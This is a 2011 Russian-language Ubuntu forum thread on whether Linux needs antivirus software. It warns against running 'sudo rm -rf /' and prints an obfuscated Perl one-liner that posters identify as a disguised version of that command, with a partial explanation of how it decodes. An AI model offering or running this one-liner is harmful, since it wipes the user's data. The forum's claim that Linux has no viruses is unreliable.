Есть вопрос?
Зайди на форум

Поиск на сайте: Advanced

Denix - новый дистрибутив Linux. Русификация Ubuntu и установка кодеков

dkws.org.ua
Форум сайта dkws.org.ua
 
Главная    ТемыТемы    АльбомАльбом    РегистрацияРегистрация 
 ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 

Анитивирус на Убунте

 
Начать новую тему Ответить на тему    Список форумов dkws.org.ua -> Ubuntu
 
Автор Сообщение
Mega

Участник тусовки


Зарегистрирован: 06.10.2010
Сообщения: 219
Откуда: из Украины

СообщениеДобавлено: Вт Фев 08, 2011 10:03 pm    Заголовок сообщения: Анитивирус на Убунте
Ответить с цитатой

Собственно сабж, есть ли антивирус для убунты или нету и перейдут ли вирусы к убунте через виндовс?
_________________
<?php echo "А php вещь классная)" ?>
Вернуться к началу
Посмотреть профиль Отправить личное сообщение нет Моб. телефон
Anderson

Завсегдатай


Зарегистрирован: 08.07.2006
Сообщения: 642
Откуда: localhost

СообщениеДобавлено: Вт Фев 08, 2011 11:40 pm    Заголовок сообщения:
Ответить с цитатой

Разве что такой:


А если серьезно - НЕТ. Под линукс не существует вирусов. Существуют лишь зловредные скрипты (которые надо скачать и выполнить от рута) - и то в жизни таких еще не встречал. Людям это не надо. Вирусы пишут линуксоиды для виндоюзеров Smile Существует 2 главных уязвимости линукса:
1) "sudo rm -rf /" - эту команду не следует никогда выполнять, даже если советуют
2) запуск "левых" bash-скриптов с "левых" сайтов - не следует их выполнять, если не знаешь, что они делают, и никто не написал отзыв

А виндовские под линуксом просто-напросто не запустятся (даже с wine'ом ничего не наделают).
_________________
ArchLinux + Enlightenment 17 (E17)
Вернуться к началу
Посмотреть профиль Отправить личное сообщение anderson.dunai@gmail.com Моб. телефон ICQ Number
den

Старожил


Зарегистрирован: 31.01.2006
Сообщения: 13870
Откуда: Кировоград, Украина

СообщениеДобавлено: Ср Фев 09, 2011 7:26 am    Заголовок сообщения:
Ответить с цитатой

Anderson, Very Happy Very Happy Very Happy Very Happy Question Question
Вернуться к началу
Посмотреть профиль Отправить личное сообщение dhsilabs@jabber.ru
Шульц

Завсегдатай


Зарегистрирован: 10.02.2009
Сообщения: 583
Откуда: Russland

СообщениеДобавлено: Ср Фев 09, 2011 10:20 am    Заголовок сообщения:
Ответить с цитатой

Anderson, недавно переустанавливал Ubuntu и решил напоследок выполнить команду sudo rm -rf /, так как в принципе ничего не терял. Захотелось посмотреть, а что же всё-таки будет? Ни фига не получилось. Система наотрез отказалась выполнять команду. Как-то, даже, разочаровался. Smile
_________________
Life is short - write better code!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Mega

Участник тусовки


Зарегистрирован: 06.10.2010
Сообщения: 219
Откуда: из Украины

СообщениеДобавлено: Ср Фев 09, 2011 11:30 am    Заголовок сообщения:
Ответить с цитатой

Anderson, вот это и есть bash-скрипт sudo rm -rf / ?
Код:
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

_________________
<?php echo "А php вещь классная)" ?>
Вернуться к началу
Посмотреть профиль Отправить личное сообщение нет Моб. телефон
chip

Тысячник


Зарегистрирован: 22.04.2010
Сообщения: 2498

СообщениеДобавлено: Ср Фев 09, 2011 6:23 pm    Заголовок сообщения:
Ответить с цитатой

Anderson, вот так выдал, наверное в етом приколе всетаки есть доля правды, если ты в сети так нельзя отрицать что 100% защищен.
Very Happy Very Happy Question Neutral
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Anderson

Завсегдатай


Зарегистрирован: 08.07.2006
Сообщения: 642
Откуда: localhost

СообщениеДобавлено: Ср Фев 09, 2011 10:39 pm    Заголовок сообщения:
Ответить с цитатой

Mega писал(а):
Anderson, вот это и есть bash-скрипт sudo rm -rf / ?
Код:
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Именно Wink Это именно она в запутанном виде. Эта команда - это, кстати, один из самых популярных способов обломать неопытных пользователей линукса

Цитата:
Первая конструкция анализирует переменную $? - код возврата предыдущей команды. Так как перед выполнением этой конструкции дочерних процессов не создавалось, $? будет содержать 0, и выполнена будет вторая "ветка" - s;;=]=>%-{<-|}<&|`{;. Эта команда, в свою очередь, заменяет строку в переменной-аккумуляторе $_ на =]=>%-{<-|}<&|`{ (напоминаю: первый символ после s устанавливает ограничитель параметров этого оператора, и хотя традиционно используются слэш '/' или труба '|', для неясности в этой конструкции используется ограничитель ';').

Вторая команда транслирует содержимое "аккумулятора" по достаточно сложным правилам. В левой части указано четыре диапазона символов, в правой - один. Если раскрыть эти диапазоны, получим следующее соответствие:

!"#$%&'()*+,-./:;<=>?@[\]^_`{|}
`abcdefghijklmnopqrstuvwxyz{/" -

_________________
ArchLinux + Enlightenment 17 (E17)
Вернуться к началу
Посмотреть профиль Отправить личное сообщение anderson.dunai@gmail.com Моб. телефон ICQ Number
dias-75

Новенький


Зарегистрирован: 09.11.2010
Сообщения: 30

СообщениеДобавлено: Чт Фев 10, 2011 8:47 am    Заголовок сообщения:
Ответить с цитатой

А вот я усложню вопрос Smile Как известно виндовсвирусы,трояны... попадают в линукс, но ничего сделать не могут по причине другого прогр.кода и разграничения прав.
Я подчеркну - речь идет не о линукс, а о виндовсвирусах и других вред.программах.
Возьмем комп, в загрузчике виндовс и убунту на выбор. Юзер заходит в линукс,открывает и заходит в виндовсраздел -может-ли имеющийся в убунте виндовсвирус,троян ... сам туда автоматом запуститься? Ну,примерно так, как они запускаются автоматом на флешку? Я в линукс совсем недавно,а в виндовс почти не разбираюсь - потому прошу ответить как для чайника Smile Ну и еще вопрос- если я находясь в линукс, открою виндовс раздел и скопирую туда файл, скачанный с интернета, содержащий вредоносную программу, то потом при загрузке в виндовс я могу получить автозапуск этой прогр.( если она способна конечно к автозапуску)?
Паранойи за собой не замечал Smile - просто интересно детальней разобраться в вопросе.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
chip

Тысячник


Зарегистрирован: 22.04.2010
Сообщения: 2498

СообщениеДобавлено: Чт Фев 10, 2011 11:08 am    Заголовок сообщения:
Ответить с цитатой

dias-75, ты просто не понял, почитай внимательней второй пост сверху, Anderson, все ясно описал, а на счет винды ето уже другая тема.
Цитата:
Юзер заходит в линукс,открывает и заходит в виндовсраздел -может-ли имеющийся в убунте виндовсвирус,троян ... сам туда автоматом запуститься?
в линуксе нет. А вообще пойми, вирус ето тоже програма.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
dias-75

Новенький


Зарегистрирован: 09.11.2010
Сообщения: 30

СообщениеДобавлено: Чт Фев 10, 2011 11:39 am    Заголовок сообщения:
Ответить с цитатой

То что вирус -это программа я понимаю. Логика моя по второму вопросу была такая - виндовсвирус работать в линуксе не может ( не его программная среда),но если я сам того не подозревая его,скачанного с каким-либо файлом, помещу в виндовсраздел ( его родную среду), то когда я перезагружусь в виндовс, то он по идее должен сработать, если я его запущу или если он настроен на автозапуск то тогда он сам запустится в родной-то среде. Вот это мне поясни,пожалуйста.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
chip

Тысячник


Зарегистрирован: 22.04.2010
Сообщения: 2498

СообщениеДобавлено: Чт Фев 10, 2011 11:52 am    Заголовок сообщения:
Ответить с цитатой

dias-75 писал(а):
виндовсвирус работать в линуксе не может ( не его программная среда),но если я сам того не подозревая его,скачанного с каким-либо файлом, помещу в виндовсраздел ( его родную среду), то когда я перезагружусь в виндовс, то он по идее должен сработать, если я его запущу или если он настроен на автозапуск то тогда он сам запустится в родной-то среде. Вот это мне поясни,пожалуйста.
я пацталом, если в винде запустиш то ясен пень что он сработает... для вируса неважно каким образом он попал в винду, и где он находится главное то что ты ево в винде запустил.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
dias-75

Новенький


Зарегистрирован: 09.11.2010
Сообщения: 30

СообщениеДобавлено: Чт Фев 10, 2011 12:29 pm    Заголовок сообщения:
Ответить с цитатой

Smile Вылезай из-под стола,вылезай. То что элементарно IT-шникам вовсе не так очевидно обычным пользователям.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Mega

Участник тусовки


Зарегистрирован: 06.10.2010
Сообщения: 219
Откуда: из Украины

СообщениеДобавлено: Пт Фев 11, 2011 1:05 pm    Заголовок сообщения:
Ответить с цитатой

А какие еще есть вредоносные команды ? Как говорится "Врага надо знать в лицо!" Wink
_________________
<?php echo "А php вещь классная)" ?>
Вернуться к началу
Посмотреть профиль Отправить личное сообщение нет Моб. телефон
chip

Тысячник


Зарегистрирован: 22.04.2010
Сообщения: 2498

СообщениеДобавлено: Пт Фев 11, 2011 2:30 pm    Заголовок сообщения:
Ответить с цитатой

Mega, вредоносных команд нет, у всех свое предназначение, а навредить можно многими способами, например изменить права chgrpилиchown
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Показать сообщения:   
Начать новую тему Ответить на тему    Список форумов dkws.org.ua -> Ubuntu Часовой пояс: GMT
Страница 1 из 1
 Главная страница сайта
 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
© Колисниченко Денис